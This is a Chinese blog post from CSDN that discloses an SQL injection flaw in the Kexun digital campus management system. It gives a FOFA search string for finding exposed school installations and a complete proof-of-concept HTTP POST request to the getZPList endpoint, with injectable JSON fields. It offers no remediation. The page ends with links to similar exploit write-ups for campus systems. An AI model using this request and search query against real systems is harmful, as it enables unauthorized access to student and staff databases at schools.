科迅数字化校园综合管理系统存在SQL注入漏洞

已于 2024-08-21 00:42:33 修改
阅读量252 收藏 5
点赞数 3
文章标签: sql 数据库
于 2024-08-21 00:41:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141371449
版权

漏洞描述
 安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科迅数字化校园综合管理系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

FOFA:

body="数字化校园综合管理系统"

 漏洞复现

 POC:

POST /DC_JY/getZPList?fb=1 HTTP/1.1
Host: 
Content-Length: 187
Accept: application/json, text/javascript, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Content-Type: application/x-www-form-urlencoded
Origin: http://127.0.0.1
Referer: http://127.0.0.1/DC_JY/ZP_Index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; loginfrom=DC; xxmc=èä¸ä¸­ç­ä¸ä¸å­¦æ ¡; ASP.NET_SessionId=q1mamrdkce051qeoelyfzyk1; sid=SX7JFLFX85TLU0AL
Connection: keep-alive

fdstr=%7B%22S_Position%22%3A%221*%22%2C%22S_Company%22%3A%221'%22%2C%22S_WorkingPlace%22%3A%221'%22%2C%22S_MonthlyPay1%22%3A%221'%22%2C%22S_MonthlyPay2%22%3A%221'%22%7D&page=1&pagesize=10

 sqlmap结果

马船长
关注
智慧校园信息管理系统存在任意文件上传漏洞
千寻的博客
07-22 235
智慧校园信息管理系统PSE`存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
科讯一卡通管理系统get_kq_record存在SQL注入漏洞
xiaokp7的博客
07-24 118
随着信息化技术的不断发展和普及,传统的校园卡已经无法满足学生和学校的需求。学生需要更加便捷、快速的服务,学校需要更加高效、智能的管理方式。因此,智慧校园一卡通系统应运而生。校园一卡通”可广泛用于门禁、图书馆登记、网络教室上机、签到、就餐、消费、圈存等,利用先进的信息技术,逐步实现学校的数字化、网络化、虚拟化和智能化,大力推进教育信息化,加快实现素质教育和教育跨越式发展的战略目标,最终实现“一卡在手,走遍校园”。
科迅OA办公系统存在SQL注入漏洞
2301_77012231的博客
08-14 214
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科迅OA办公系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 910
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
科讯kesioncms 5.5以下漏洞拿shell方法的原理总结
09-28
科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。
关于“高校现代教学管理系统漏洞”的攻击与防范
Angiexia的专栏
06-23 2704
前段时间在群里看到一哥们分享了一个“高校现代教学管理系统漏洞”,方法很简单,很快就能拿到webshell。 原理和fck差不多,也是利用上传功能。 ftb.imagegallery.aspx 这是一个具有上传功能的目录,添加在该网站域名后即可打开。 之后上传带有可解析的asp马(需要解析改后缀,为安全起见就不公开了。)便可直接访问。 截图如下: 首先:搜索
科迅图书馆云平台SQL注入漏洞
weixin_43167326的博客
05-30 691
JEPaaS 低代码平台 accessToTeanantInfo SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
科讯校园一卡通管理系统 多处SQL注入致RCE漏洞复现
0xSec
07-24 2930
科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking、DataService.asmx等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科迅数字化校园方案_高职院校.docx
06-01
科迅数字化校园方案是针对高职院校的一套全面的信息化解决方案,旨在通过先进的信息技术手段,提升教育质量和管理效率,构建一个高度信息化的人才培养环境。这一方案涵盖了教学、管理等多个方面,旨在利用多媒体、...
科迅-智慧校园信息化产品方案(普教).docx
06-01
该方案由安徽省科迅教育装备有限公司研发,具备完整的知识产权,涵盖了数字化校园、一卡通系统、图书管理系统等多个教育信息化关键模块。 在技术架构上,科迅智慧校园方案基于.NET体系,支持多种操作系统(如...
【精品】科迅智慧校园信息化产品方案(普教)85页.docx
06-01
6. **公司背景**:科迅教育装备集团专注于教育信息化产品研发,拥有多款自主知识产权的教育软件,如数字化校园校园一卡通、图书管理系统等,以高性价比和专业服务受到用户好评。 7. **系统架构**:站群系统由软件...
科迅图书馆云平台 WebCloud.asmx SQL注入致RCE漏洞复现
0xSec
05-30 595
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
PostgreSQL 字段使用pglz压缩测试
最新发布
文牧之的博客
09-30 283
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
SQL 查询优化与实战
qq_63170044的博客
09-26 926
SQL 查询优化不仅仅是提高系统性能的重要手段,更是确保数据库在高并发环境下稳定运行的核心技能。通过合理使用索引、优化。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 750
一旦发现漏洞sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
PostgreSQL 17新特性merge语法增强
zxrhhm的博客
09-27 493
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 878
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值